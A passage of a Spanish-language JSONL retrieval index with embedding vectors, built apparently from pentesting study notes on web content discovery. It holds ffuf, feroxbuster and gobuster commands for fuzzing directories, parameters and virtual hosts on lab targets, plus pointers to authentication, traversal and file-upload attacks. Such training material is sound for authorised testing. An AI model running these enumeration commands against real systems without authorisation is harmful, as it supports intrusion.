-0.03827, 0.0549, -0.04811, 0.03012, 0.01654, 0.03207, -0.05291, -0.04967, 0.00697, -0.03962, -0.03666, -0.05579, -0.03406, -0.00151, 0.01303, -0.04181, -0.01694, -0.00774]} -{"tipo": "pregunta", "herramienta": "Content discovery", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Content discovery.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Lo que importa\n- **Extensiones** (`-x` / `-e`): prueba segΓΊn la tecnologΓ­a β†’ `php`, `asp`, `aspx`, `txt`, `bak`, `zip`, `old`.\n- **RecursiΓ³n**: feroxbuster baja solo a las carpetas que encuentra (gobuster no).\n- **Wordlists**: `raft-large-words`, `directory-list-2.3-medium`. `common.txt` es nivel junior (Trampas de enumeraciΓ³n).\n- **Filtrar ruido** en ffuf: `-fc 404` (cΓ³digo), `-fs 1234` (tamaΓ±o), `-mc 200,301,302`.", "indexar": "existe alguna alternativa a feroxbuster que filtre el ruido por cΓ³digo HTTP?", "v": [-0.11456, -0.10332, -0.1783, -0.10208, -0.10504, -0.14454, -0.05537, 0.06902, 0.00037, -0.09781, -0.1437, -0.10972, 0.02465, 0.01794, 0.1136, -0.14954, 0.00201, -0.0059, 0.04406, -0.1353, -0.01362, -0.0218, -0.13074, -0.01514, -0.05289, -0.0591, -0.02126, 0.10187, -0.16029, -0.08261, 0.11544, -0.00081, 0.0753, 0.07955, -0.22129, 0.06362, 0.10019, 0.12455, 0.01001, 0.12839, 0.0243, 0.09684, 0.00661, 0.05156, -0.09149, -0.02369, -0.11409, -0.01817, 0.08428, -0.00267, 0.00158, -0.10229, -0.13888, 0.05667, -0.01085, 0.05228, 0.06744, -0.11393, -0.03577, -0.13331, 0.04858, -0.0905, -0.00279, -0.10857, 0.00547, 0.02331, 0.06346, 0.06891, -0.06018, 0.05404, -0.01851, -0.01169, 0.00281, -0.09206, 0.09676, 0.02039, 0.02522, -0.08821, -0.03622, 0.14228, 0.06845, -0.00111, 0.0905, -0.03602, -0.0538, -0.03677, -0.0399, -0.13276, 0.0003, -0.04662, 0.02954, 0.07897, 0.029, 0.02565, 0.03909, -0.06843, 0.05184, 0.02656, -0.01759, 0.00615, 0.08859, 0.04054, 0.01642, -0.03049, 0.14101, 0.04884, 0.07917, -0.01426, 0.03241, -0.09045, 0.00668, 0.00244, -0.05741, -0.03469, 0.03229, -0.04432, -0.02452, 0.01458, 0.02044, -0.03047, -0.11105, 0.03486, -0.1146, -0.00985, -0.01796, 0.0457, 0.06018, 0.02786, 0.02663, -0.09792, 0.02837, -0.02556, -0.01652, 0.01269, -0.08018, 0.016, 0.00577, -0.05187, 0.0712, -0.01587, -0.02083, 0.0328, -0.02489, 0.06668, -0.0463, 0.06864, 0.00462, -0.00627, -0.00902, -0.07544, -0.0569, -0.02553, -0.06079, 0.05302, -0.06418, 0.10802, 0.02306, -0.02085, -0.03705, 0.01776, 0.00895, 0.00278, 0.0132, -0.01712, 0.02964, 0.09029, -0.05716, 0.00536, -0.01125, -0.0408, 0.00881, -0.03155, 0.12782, -0.11486, -0.05749, -0.01043, -0.02614, -0.01766, 0.0575, -0.02291, 0.03454, 0.04766, 0.00069, -0.03885, 0.06631, -0.00423, 0.02471, 0.03888, -0.13071, -0.04848, 0.04447, -0.03856, -0.06919, 0.02353, 0.01996, -0.00163, 0.05252, -0.04614, 0.0008, -0.04242, -0.06779, -0.00725, 0.0686, -0.09212, 0.00357, 0.03712, 0.03273, -0.03094, 0.0283, 0.02068, 0.06832, -0.01171, -0.00929, -0.0114, -0.01381, 0.09485, 0.04551, -0.00387, 0.03588, 0.00097, -0.00557, -0.0143, -0.00811, 0.02601, 0.02046, 0.01853, -0.0059, -0.0431, 0.03772, 0.00303, 0.00448, -0.04215, -0.02754, 0.04233, 0.03203, 0.06188, -0.08073, 0.02687, -0.01702, -0.03219, -0.00058, -0.03149, -0.00886, 0.00345, 0.043, -0.04261, -0.05843, -0.04881, -0.00397, 0.03069, -0.03682, -0.02634, -0.04178, -0.01647, 0.02777, 0.03232]} -{"tipo": "pregunta", "herramienta": "Content discovery", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Content discovery.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Lo que importa\n- **Extensiones** (`-x` / `-e`): prueba segΓΊn la tecnologΓ­a β†’ `php`, `asp`, `aspx`, `txt`, `bak`, `zip`, `old`.\n- **RecursiΓ³n**: feroxbuster baja solo a las carpetas que encuentra (gobuster no).\n- **Wordlists**: `raft-large-words`, `directory-list-2.3-medium`. `common.txt` es nivel junior (Trampas de enumeraciΓ³n).\n- **Filtrar ruido** en ffuf: `-fc 404` (cΓ³digo), `-fs 1234` (tamaΓ±o), `-mc 200,301,302`.", "indexar": "que programa me sirve para filtrar resultados de enumeraciΓ³n por tamaΓ±o de archivo?", "v": [0.08534, 0.01654, -0.02404, -0.2328, 0.02435, -0.13211, 0.00307, -0.03813, -0.11266, -0.14931, 0.00296, -0.01874, 0.0146, -0.10709, 0.06761, -0.04866, 0.07733, -0.19334, 0.11792, 0.02586, 0.01623, 0.03482, -0.13169, -0.10222, -0.09918, -0.01454, 0.05658, 0.03043, -0.12024, -0.00456, 0.07261, 0.07866, 0.09002, -0.08695, -0.02587, 0.061, 0.09193, -0.04499, -0.17535, 0.11291, 0.06608, 0.05747, -0.06533, 0.05778, -0.04566, -0.04801, 0.02403, 0.07913, 0.05311, -0.02375, 0.00882, 0.03801, 0.03483, 0.10221, -0.06326, -0.13502, -0.09644, -0.14526, 0.01478, 0.00112, -0.04548, -0.00937, 0.06448, -0.00966, -0.04649, -0.02485, 0.05418, 0.04455, -0.11732, 0.02545, -0.09257, 0.07507, 0.07179, -0.04036, -0.08975, 0.01053, -0.01116, -0.09663, -0.05434, -0.05657, -0.00549, -0.06178, 0.04351, -0.01224, -0.09892, -0.02154, 0.04155, -0.03105, 0.03452, -0.10188, -0.01605, 0.03019, -0.01349, 0.06929, 0.0593, -0.11669, 0.10795, 0.0575, 0.01085, 0.02098, 0.07575, -0.09548, -0.05807, 0.10477, 0.04381, 0.107, 0.01202, -0.00568, -0.0879, 0.0387, 0.05285, -0.00586, 0.07474, 0.00477, -0.1173, -0.02625, 0.00124, -0.0571, 0.03384, -0.03226, -0.0529, 0.02864, -0.11904, 0.04686, 0.01506, -0.02019, 0.03167, 0.09711, -0.03817, 0.02219, 0.03925, 0.15261, -0.08471, -0.09814, -0.02578, -0.09645, 0.02992, -0.01166, 0.00688, -0.0653, 0.03787, 0.04613, -0.00086, 0.06949, 0.06819, -0.0435, 0.08143, -0.03389, -0.04741, -0.06453, 0.06782, -0.05626, 0.03488, 0.00558, -0.05365, 0.02339, 0.0694, -0.09613, -0.06615, 0.02072, -0.07892, 0.0619, -0.00399, -0.0043, 0.08994, -0.03353, 0.03994, 0.00247, 0.09146, -0.03524, 0.03152, 0.01631, -0.01651, -0.12477, -0.05559, 0.05498, -0.0242, -0.02988, 0.03192, 0.00438, -0.03029, 0.08385, 0.08744, 0.03526, -0.03527, -0.04551, -0.00629, -0.0287, -0.06374, -0.01034, 0.01455, 0.03056, -0.02087, -0.02137, 0.02576, -0.01224, -0.02013, 0.01773, 0.03164, -0.02356, -0.01392, -0.00144, -0.06543, 0.06298, 0.00758, 0.07576, -0.04359, -0.0088, 0.07397, 0.02938, 0.00087, 0.05043, 0.04156, -0.03906, -0.03295, 0.02571, 0.07106, 0.04724, 0.06217, 0.0923, -0.05385, -0.01794, 0.0652, 0.07123, -0.01648, -0.05512, 0.03234, -0.03175, 0.00169, -0.03044, -0.01767, 0.00383, -0.06175, -0.04608, 0.03087, -0.06855, -0.00833, 0.00663, -0.00515, -0.10618, -0.01826, 0.00025, -0.00319, 0.00082, 0.01495, 0.00387, -0.02761, 0.03187, 0.01309, -0.02133, -0.08016, -0.01148, 0.02768, -0.0095, 0.06976, -3e-05]} -{"tipo": "pregunta", "herramienta": "Content discovery", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Content discovery.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## MΓ‘s allΓ‘ de directorios\n```bash\nffuf -u http://IP/page.php?FUZZ=test -w params.txt # descubrir parΓ‘metros (o usa arjun)\nffuf -H \"Host: FUZZ.objetivo.htb\" -u http://IP -w subs.txt # vhosts β†’ Vhosts y subdominios\n```", "indexar": "ΒΏquΓ© programa puedo usar para descubrir los parΓ‘metros de una pΓ‘gina web?", "v": [-0.16459, 0.10783, -0.08716, -0.20415, 0.03536, -0.09805, 0.02438, -0.14804, -0.07376, -0.12061, -0.04349, -0.0882, -0.08888, -0.10895, -0.07516, 0.07414, 0.11971, -0.03658, 0.14108, -0.0383, 0.01488, -0.0534, -0.15235, -0.08177, -0.13266, 0.0263, 0.0823, -0.03387, -0.07287, -0.05779, -0.08698, 0.02915, 0.00595, -0.05815, -0.08839, 0.06056, 0.11363, 0.04145, 0.09953, 0.046, 0.04389, -0.09986, 0.00993, 0.04468, 0.07675, 0.06798, -0.03955, -0.11238, -0.07047, -0.03491, 0.02766, 0.02364, -0.07139, 0.0794, -0.01848, -0.10181, 0.09524, -0.10318, -0.01979, -0.05316, 0.04294, -0.01369, -0.02808, -0.02414, -0.08094, -0.15144, -0.00222, 0.09068, -0.00116, 0.07555, 0.02994, -0.01844, 0.01003, -0.02615, 0.05851, 0.07883, 0.0434, -0.06079, 0.14623, -0.03946, -0.01719, 0.07899, 0.0193, 0.01683, -0.12441, 0.02813, 0.0522, -0.05435, 0.02769, -0.12919, 0.01394, 0.07545, -0.01418, 0.00952, -0.02933, -0.13544, 0.048, 0.07801, 0.04779, -0.01702, -0.00916, -0.06476, -0.05252, 0.11105, 0.03193, 0.02327, 0.05726, -0.00509, -0.09249, 0.01484, 0.03222, -0.03139, -0.09439, -0.11734, -0.11139, 0.06967, 0.00533, -0.01111, -0.02447, -0.14739, -0.0952, 0.11552, -0.06018, -0.00674, 0.14331, 0.02608, 0.0212, 0.08495, -0.03492, 0.0625, 0.00763, -0.01578, -0.04751, 0.00689, -0.01662, -0.00772, 0.02047, -0.00401, 0.03351, -0.0135, -0.00283, -0.01976, -0.07396, 0.03283, 0.07051, -0.05678, -0.03163, -0.01062, -0.11792, 0.04818, -0.01247, 0.01441, -0.01256, 0.07054, -0.06467, -0.03149, 0.08688, 0.00525, -0.09123, -0.07505, -0.07787, 0.00101, 0.02519, -0.00287, 0.07147, -0.01501, -0.03417, -0.01047, 0.01469, 0.10465, 0.02989, 0.12178, 0.04758, -0.10458, 0.00831, -0.00623, -0.07434, -0.04816, 0.0608, 0.00999, -0.03585, 0.01798, 0.02878, -0.00998, -0.0298, -0.00783, 0.06127, -0.01038, -0.08628, 0.00242, -0.0277, 0.03322, 0.00978, 0.01148, 0.02898, 0.01505, -0.00232, 0.00311, 0.0226, -0.07499, -0.02637, -0.0293, -0.01057, -0.01981, 0.05813, 0.03643, -0.02215, -0.04711, 0.0281, 0.04398, -0.00923, -0.07894, 0.04733, -0.00414, -0.04395, -0.01725, 0.02373, 0.03725, 0.03826, -0.00028, 0.02684, 0.03988, 0.03531, 0.09328, 0.07262, -0.0712, 0.02015, -0.00847, -0.00832, 0.01898, -0.00239, -0.07415, -0.01719, 0.00494, 0.01052, -0.05791, -0.00194, 0.03283, -0.03748, -0.02019, -0.03986, 0.07903, -0.00171, 0.01068, 0.01213, -0.00202, -0.07481, -0.00574, -0.02367, 0.00499, -0.05142, -0.00451, 0.02128, -0.04215, 0.02419, 0.0629]} -{"tipo": "pregunta", "herramienta": "Content discovery", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Content discovery.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## MΓ‘s allΓ‘ de directorios\n```bash\nffuf -u http://IP/page.php?FUZZ=test -w params.txt # descubrir parΓ‘metros (o usa arjun)\nffuf -H \"Host: FUZZ.objetivo.htb\" -u http://IP -w subs.txt # vhosts β†’ Vhosts y subdominios\n```", "indexar": "con quΓ© herramienta puedo encontrar las subdominios o nombres de host de un objetivo?", "v": [-0.0623, 0.13782, -0.07585, -0.1331, 0.06249, -0.01602, -0.12236, -0.08814, -0.03187, -0.10715, -0.07739, -0.07271, -0.02015, -0.12132, 0.08398, 0.01809, 0.23634, -0.11577, -0.08803, 0.02187, -0.044, -0.04612, -0.16683, 0.02352, -0.05593, -0.15855, 0.07916, 0.10441, -0.14789, 0.05539, 0.0176, -0.122, 0.00524, -0.06636, -0.10136, -0.13116, 0.01899, 0.02183, -0.01627, 0.11057, -0.05268, 0.01045, -0.09238, 0.04378, -0.01503, -0.01142, -0.14876, 0.06766, 0.00752, -0.12569, -0.06584, -0.15206, -0.05915, -0.05507, -0.00936, -0.17985, 0.11306, -0.09993, 0.01433, -0.05241, -0.14088, -0.04225, 0.01794, 0.05059, 0.06447, -0.0621, -0.05667, -0.0018, -0.10718, 0.00954, 0.01784, -0.03442, 0.04424, -0.01031, 0.0852, 0.04312, 0.02966, 0.00805, -0.00885, -0.09509, 0.02208, -0.04497, -0.10429, 0.06629, -0.1181, -0.08393, 0.06724, -0.03877, -0.03434, -0.10164, 0.04746, 0.05358, 0.07447, 0.03032, 0.00663, -0.00378, 0.05702, 0.01783, -0.07131, -0.05169, 0.13734, 0.03089, -0.10278, 0.16431, 0.02486, 0.0364, -0.09497, -0.02433, -0.07848, -0.01157, 0.08185, 0.001, -0.02254, 0.04183, -0.03866, -0.02617, -0.07297, 0.01677, 0.05383, -0.06894, -0.05621, 0.01052, 0.01009, -0.00278, 0.02147, 0.01787, -0.01661, 0.04932, 0.04118, -0.09183, 0.00702, 0.01529, -0.03987, -0.00628, -0.02873, -0.0322, 0.09257, -0.09979, 0.04359, -0.00423, -0.04162, 0.04364, 0.02976, -0.08956, 0.05587, -0.02502, 0.07926, -0.08225, -0.04318, -0.01, 0.00438, 0.00104, 0.04037, -0.00154, -0.08341, 0.00879, -0.00374, -0.01976, -0.06339, 0.02846, -0.06629, -0.08604, -0.05178, -0.0355, -0.01059, -0.0551, 0.01421, -0.059, 0.04746, 0.03457, 0.0135, 0.08658, 0.0003, -0.04199, 0.0306, -0.02492, -0.02605, -0.0492, -0.00531, -0.08422, -0.021, 0.02714, -0.05818, 0.02899, 0.03361, -0.0239, 0.03906, -0.02782, 0.01081, 0.00131, 0.00388, 0.01678, -0.01936, -0.07252, -0.04823, 0.00876, 0.00379, -0.00806, 0.04161, -0.02699, -0.085, -0.05586, 0.03162, -0.02241, 0.02703, 0.00432, -0.08261, -0.00391, -0.02105, -0.00598, 0.04552, -0.03796, 0.05502, -0.02648, -0.02996, 0.00041, -0.05702, 0.02172, -0.02662, 0.02539, -0.00194, 0.01957, 0.08583, 0.00134, -0.01648, -0.0097, 0.07764, 0.00694, 0.02511, 0.00667, 0.0075, -0.0085, -0.00488, -0.01402, 0.04051, -0.03587, 0.03512, 0.01354, -0.0353, 0.05087, -0.05182, 0.05022, 0.04606, 0.00271, -0.04371, -0.04716, 0.01302, 0.01467, -0.05141, -0.04241, -0.02098, 0.06321, 0.04313, -0.06665, 0.0683, 0.00889]} -{"tipo": "pregunta", "herramienta": "Content discovery", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Content discovery.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## MΓ‘s allΓ‘ de directorios\n```bash\nffuf -u http://IP/page.php?FUZZ=test -w params.txt # descubrir parΓ‘metros (o usa arjun)\nffuf -H \"Host: FUZZ.objetivo.htb\" -u http://IP -w subs.txt # vhosts β†’ Vhosts y subdominios\n```", "indexar": "cual es una alternativa libre a ffuf para hacer fuzzing en URLs?", "v": [-0.07273, -0.04912, -0.12769, 0.10583, -0.05137, 0.03198, -0.08601, -0.10266, -0.09495, -0.02506, -0.13821, -0.16218, -0.12, 0.11737, -0.01157, -0.1539, -0.01647, -0.02177, 0.04543, -0.03435, -0.03483, -0.00774, -0.15562, -0.16484, -0.16781, -0.09562, 0.01161, -0.02233, -0.10109, -0.12245, 0.26125, 0.0287, 0.01203, 0.04561, -0.0436, 0.114, 0.20067, 0.08262, 0.07664, -0.0006, 0.01109, 0.02262, -0.16585, 0.09448, -0.03356, -0.08104, -0.13823, -0.05227, 0.08413, 0.09111, 0.09071, -0.04572, 0.02049, 0.03057, 0.01749, -0.05505, 0.00222, -0.20783, -0.05849, 0.02018, -0.0545, -0.05272, 0.0143, -0.00063, -0.02628, 0.02402, -0.05129, 0.01744, -0.02772, 0.04176, 0.07508, -0.04629, -0.03275, -0.14018, -0.11398, 0.11899, -0.03277, -0.04743, 0.00025, 0.01027, 0.03254, -0.05028, -0.04682, 0.04411, 0.01132, -0.05405, 0.04057, -0.09935, -0.02145, 0.01197, 0.01282, 0.08054, -0.068, 0.06045, 0.01617, -0.08802, 0.02442, 0.07432, 0.03905, 0.02727, 0.04774, 0.00017, -0.11196, -0.01476, 0.03882, -0.07027, 0.01749, 0.02467, -0.03954, 0.06531, 0.0083, 0.08459, -0.00411, -0.07257, -0.0246, -0.06751, -0.0408, -0.00177, 0.01162, -0.04536, -0.01033, -0.0856, -0.04249, -0.07534, -0.02176, 0.08825, 0.05426, -0.00441, -0.03727, 0.04416, 0.09464, -0.00816, -0.05263, -0.07799, -0.04353, -0.01898, 0.11235, -0.01598, -0.00146, 0.01113, 0.00415, 0.01408, 0.0096, 0.02816, 0.01801, -0.09064, -0.01486, -0.0415, -0.01086, -0.008, -0.08208, 0.02655, -0.01722, 0.04245, -0.02488, -0.00995, -0.00869, 0.01771, -0.04838, 0.05383, 0.04737, 0.03233, 0.00144, 0.00232, 0.04108, -0.01816, -0.02081, 0.00629, -0.06705, -0.05449, 0.01062, 0.08528, 0.0189, -0.08763, 0.08546, -0.05411, -0.05841, -0.06107, 0.04176, -0.02856, 0.05369, 0.00873, -0.0496, 0.01125, 0.03449, -0.07944, 0.05378, -0.00486, -0.01335, 0.04853, -0.01436, -0.02388, -0.07251, -0.01357, -0.01546, 0.05527, 0.02003, -0.08661, -0.07743, -0.02312, -0.04269, -0.05329, -0.0092, -0.05238, -0.03624, -0.00326, -0.02779, -0.00068, -0.02707, -0.00107, 0.06282, 0.00087, 0.06882, -0.00812, -0.04326, 0.03109, -0.00461, -0.03089, -0.00584, -0.03342, 0.06499, 0.05043, 0.02307, 0.00306, -0.03327, 0.00279, 0.03141, 0.06863, -0.05467, -0.01151, -8e-05, -0.01076, 0.02049, 0.03277, 0.01747, 0.0068, 0.01125, 0.06591, -0.00039, -0.01939, 0.01842, 0.0406, -0.03332, 0.03718, 0.01545, 0.00461, -0.10665, -0.01688, -0.06877, -0.05009, -0.01958, 0.00094, -0.01473, 0.02351, 0.04623, 0.03342]} -{"tipo": "pregunta", "herramienta": "Content discovery", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Content discovery.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## QuΓ© hacer con lo encontrado\nCada ruta nueva = superficie nueva β†’ vuelve a Hacking web y pruΓ©bala (login β†’ Authentication attacks, `?file=` β†’ Directory traversal, upload β†’ File upload bypass).\n\nRelacionado: Burp Suite Β· EnumeraciΓ³n web Β· OSCP MOC", "indexar": "cual es la mejor herramienta para probar ataques de autenticaciΓ³n en una nueva ruta descubierta?", "v": [0.02462, 0.00514, -0.28275, -0.05616, 0.12876, -0.05321, -0.01422, -0.01135, -0.02916, 0.005, -0.06945, -0.13169, 0.03903, 0.05079, -0.00242, -0.02774, 0.04135, 0.01837, 0.10136, -0.05653, -0.00457, -0.0923, -0.09303, -0.04003, -0.08466, -0.09584, 0.08311, 0.10267, -0.02553, -0.02696, 0.04459, 0.00295, 0.03292, -0.03412, -0.09086, -0.01759, 0.04175, 0.01166, 0.09801, 0.03038, 0.01299, -0.05587, -0.09091, 0.01837, 0.0967, 0.01737, -0.04959, -0.04425, -0.06501, -0.02872, -0.0475, -0.0463, -0.13741, -0.03581, -0.03289, -0.11065, 0.0749, -0.0131, 0.07615, -0.05721, -0.08652, -0.01292, -0.10309, -0.04939, 0.05404, -0.15243, -0.03417, -0.13013, -0.10914, 0.04496, 0.04732, 0.04088, 0.04175, 0.07836, -0.06106, -0.01719, 0.04669, 0.0884, 0.12524, 0.03507, 0.09636, -0.00075, -0.0967, 0.01028, -0.08066, -0.06643, 0.10881, -0.04113, -0.00126, -0.07573, -0.01478, -0.00783, -0.04174, 0.0564, 0.00639, 0.00899, 0.09711, -0.13556, 0.01835, -0.0796, 0.06112, -0.10783, -0.12953, 0.17689, -0.04174, 0.02966, -0.1285, 0.01333, -0.05994, -0.0204, 0.00282, -0.04698, -0.07674, 0.01933, -0.01016, 0.00422, -0.04265, -0.08133, -0.0697, -0.1059, -0.05178, -0.01704, -0.14844, 0.02564, -0.01397, 0.03949, -0.07956, 0.03711, 0.03818, -0.08616, 0.02447, -0.01733, -0.03747, 0.00498, -0.07856, -0.04974, 0.05281, -0.07847, -0.04141, -0.03092, 0.03129, 0.08137, -0.03064, -0.08489, 0.01856, 0.04661, -0.02071, -0.04222, -0.10209, 0.0891, -0.01791, 0.02046, 0.03152, 0.08293, -0.05928, 0.04284, -0.02894, -0.03027, -0.08712, 0.11782, 0.01049, -0.00507, -0.04726, -0.00688, -0.00597, -0.06021, -0.02088, -0.0054, 0.05984, -0.02988, 0.04142, 0.06536, 0.05921, -0.04219, 0.03523, -0.04856, -0.03478, -0.06716, 0.05323, -0.06427, -0.00466, -0.01159, -0.04536, -0.04694, -0.01223, -0.04881, 0.08897, 0.00658, 0.0241, 0.03062, 0.02677, -0.03798, 0.02845, -0.01993, 0.02539, -0.04792, 0.03246, -0.01975, 0.01118, 0.05764, -0.02014, -0.04041, -0.12908, -0.11076, 0.05385, 0.05362, -0.01576, -0.05189, -0.00069, 0.0291, 0.08051, -0.02341, 0.09738, -0.07072, -0.08353, -0.02947, 0.03644, 0.00881, -0.04971, 0.00529, 0.04445, 0.01564, 0.02458, -0.00434, -0.00893, -0.00217, -0.04206, -0.06566, -0.02022, -0.01053, 0.07176, -0.02946, -0.02896, -0.05669, 0.06266, 0.00087, 0.07092, -0.01779, -0.10665, -0.02183, -0.01693, 0.04781, -0.00496, -0.07055, -0.02948, -0.03344, -0.01955, 0.00681, -0.06625, -0.08393, -0.00922, 0.01491, 0.11408, 0.00929, 0.02261, -0.03523]} -{"tipo": "pregunta", "herramienta": "Content discovery", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Content discovery.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## QuΓ© hacer con lo encontrado\nCada ruta nueva = superficie nueva β†’ vuelve a Hacking web y pruΓ©bala (login β†’ Authentication attacks, `?file=` β†’ Directory traversal, upload β†’ File upload bypass).\n\nRelacionado: Burp Suite Β· EnumeraciΓ³n web Β· OSCP MOC", "indexar": "que programa puedo usar para verificar si el archivo que subΓ­ se puede acceder mediante bypass?", "v": [0.00805, 0.14706, -0.22597, -0.12111, 0.06954, -0.02131, 0.05454, -0.08729, -0.15429, -0.13345, -0.10931, -0.05081, -0.0855, -0.00236, 0.02622, -0.03507, 0.06865, -0.08235, 0.06864, 0.01009, 0.11994, -0.01822, 0.00411, -0.01034, -0.03161, 0.14977, -0.00661, -0.01576, -0.12751, -0.13215, 0.00477, 0.03545, 0.07177, -0.03377, -0.09926, 0.0113, 0.05359, 0.07726, -0.01088, 0.05937, 0.06237, 0.02042, -0.08241, 0.0413, 0.00906, -0.09267, 0.02131, 0.06269, -0.01957, -0.01854, 0.03711, 0.00186, -0.14673, 0.04756, -0.06512, -0.13353, 0.00171, -0.1482, -0.00273, -0.00613, -0.03907, 0.01309, 0.01749, 0.03744, -0.04183, -0.07635, 0.08574, 0.02424, -0.165, 0.0733, -0.05663, 0.05244, 0.06202, -0.01057, -0.10328, -0.00305, -0.06533, -0.09444, 0.09208, -0.04519, -0.00968, 0.03633, 0.03499, 0.01323, -0.1582, -0.07645, 0.03964, -0.0708, 0.02504, -0.08688, 0.04662, 0.06988, 0.06547, 0.0517, 0.05117, -0.0414, 0.01771, 0.04662, 0.0298, 0.00983, 0.10829, -0.06363, -0.04332, 0.16272, 0.01028, 0.03805, 0.04439, -0.0298, -0.04386, -0.01652, -0.00868, 0.02175, -0.10295, -0.06524, -0.03906, 0.03119, -0.08485, -0.11315, 0.03453, -0.04603, -0.08501, 0.00267, -0.06097, 0.04175, 0.0766, -0.04082, 0.00321, 0.12308, -0.09679, 0.12682, -0.04078, 0.04491, -0.09909, -0.05493, -0.05843, -0.07872, 0.02542, -0.04425, 0.02058, -0.01973, 0.07989, 0.03643, -0.01751, 0.04713, 0.08982, 0.0057, -0.1026, -0.06109, -0.08157, -0.04399, 0.02834, -0.0472, -0.02666, 0.07799, -0.05344, 0.02809, 0.06985, -0.08519, -0.00666, 0.05899, -0.08147, 0.01924, -0.06287, -0.02657, 0.02534, -0.06628, -0.00423, -0.0128, 0.06727, 0.0067, -0.01846, 0.04631, 0.01827, -0.1037, -0.00483, -0.01937, -0.02356, -0.08967, 0.05145, -0.03056, -0.07945, 0.02, 0.01174, 0.04121, -0.05942, -0.03875, 0.0295, 0.01998, 0.00951, 0.0527, 0.01475, 0.06654, 0.02491, 0.07067, 0.00203, 0.00732, -0.07493, 0.01257, -8e-05, -0.03287, -0.00202, 0.00071, -0.0453, -0.05713, 0.0743, 0.0293, -0.04228, -0.01157, 0.03115, 0.05528, 0.08193, -0.07177, 0.07126, -0.04408, -0.03222, -0.00053, 0.00792, 0.06948, -0.02211, -0.01506, -0.00026, 0.017, 0.10933, 0.05199, 0.02515, -0.03322, 0.02891, 0.04245, 0.00444, 0.03086, -0.02542, 0.06579, -0.01532, 0.00839, 0.05872, -0.02099, 0.00645, 0.00154, -0.04099, -0.0843, 0.024, 0.10644, -0.00333, -0.02268, -0.02041, 0.03739, -0.0869, 0.00668, 0.00662, -0.0598, -0.00152, 0.01021, -0.00465, -0.05025, 0.07755, 0.00507]} -{"tipo": "pregunta", "herramienta": "Content discovery", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Content discovery.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## QuΓ© hacer con lo encontrado\nCada ruta nueva = superficie nueva β†’ vuelve a Hacking web y pruΓ©bala (login β†’ Authentication attacks, `?file=` β†’ Directory traversal, upload β†’ File upload bypass).\n\nRelacionado: Burp Suite Β· EnumeraciΓ³n web Β· OSCP MOC", "indexar": "con que recurso puedo repetir la enumeraciΓ³n web para probar vulnerabilidades en las nuevas superficies encontradas?", "v": [0.05504, 0.06515, -0.28193, -0.22718, 0.07956, -0.00682, -0.04315, -0.03526, -0.03678, -0.15144, 0.02409, -0.00889, -0.02256, -0.00735, -0.01531, 0.05093, -0.04187, -0.00943, 0.09577, -0.04756, 0.01505, -0.15503, -0.16118, -0.01218, -0.05008, -0.04597, 0.00982, -0.04967, 0.0296, -0.06764, -0.08135, 0.0229, 0.08371, 0.05644, -0.19187, 0.11345, 0.02987, -0.0063, -0.00403, -0.06047, 0.13235, 0.00955, -0.13812, -0.02399, 0.00663, -0.05221, -0.1295, -0.11073, -0.112, -0.00068, -0.09744, -0.03986, -0.24213, -0.07509, -0.11112, -0.06376, 0.1515, -0.01151, 0.01579, -0.08616, -0.00399, -0.00731, 0.06388, -0.01701, -0.01145, -0.02477, -0.08738, 0.09125, -0.04346, 0.11363, 0.07553, 0.05598, 0.07561, -0.05503, -0.0615, -0.05691, 0.03276, -0.05535, 0.0276, 0.00979, -0.07274, 0.04548, -0.03272, 0.03231, -0.07672, -0.0745, 0.01994, -0.02823, 0.09733, -0.12162, 0.07725, 0.05414, -0.02917, -0.04495, -0.03915, -0.06184, 0.09148, -0.021, -0.06995, 0.01388, -0.0417, -0.07258, -0.06637, 0.10072, -0.03281, 0.08821, -0.06824, 0.04683, -0.01104, -0.11214, -0.04985, -0.03093, -0.06124, -0.01545, -0.06382, 0.07455, -0.06541, -0.03813, 0.02258, 0.00642, 0.08743, -0.04229, -0.04031, 0.08299, -0.01867, 0.01089, 0.06081, 0.00494, -0.01209, -0.07856, 0.03067, 0.01885, 0.02396, 0.02359, -0.0247, -0.00131, 0.07073, 0.03406, -0.02958, 3e-05, 0.0533, 0.02967, -0.02578, -0.00264, -0.02288, 0.03372, 0.04765, -0.03268, -0.12393, 0.04646, 0.00255, -0.02958, -0.0017, 0.09025, -0.05384, 0.00246, 0.05454, -0.02117, -0.0243, 0.03889, -0.06808, 0.09349, -0.08039, 0.1223, 0.03715, 0.03425, -0.06993, -0.03899, 0.04743, 0.00032, -0.01428, 0.04383, -0.0027, -0.01946, 0.03512, 0.02187, 0.04006, 0.04302, -0.0415, -0.03534, 0.00436, -0.10084, -0.04563, -0.01406, 0.03874, -0.03502, 0.02152, 0.07926, -0.00307, 0.04231, 0.00616, -0.0006, -0.05491, 0.00763, 0.03938, -0.01884, 0.03052, 0.01822, -0.04485, -0.01502, -0.08296, -0.05245, -0.06011, -0.04045, 0.07584, 0.03274, -0.03499, -0.00166, -0.00686, -0.00195, -0.00745, 0.02994, 0.09486, -0.04742, -0.06442, -0.04412, 0.01088, 0.01178, -0.06299, -0.03783, 0.03554, 0.00432, -0.00444, 0.06322, 0.01085, 0.00876, -0.03787, -0.04534, 0.02374, 0.00741, 0.05856, -0.01493, -0.01544, -0.03684, 0.01957, -0.02743, 0.00046, 0.01272, -0.03153, 0.01291, -0.02936, 0.05433, -0.03134, -0.01633, 0.01297, -0.05313, -0.03746, 0.00981, -0.0512, -0.02668, -0.01571, 0.01262, 0.02792, -0.044, -0.0515, -0.02858]} -{"tipo": "pregunta", "herramienta": "File upload bypass", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/File upload bypass.md", 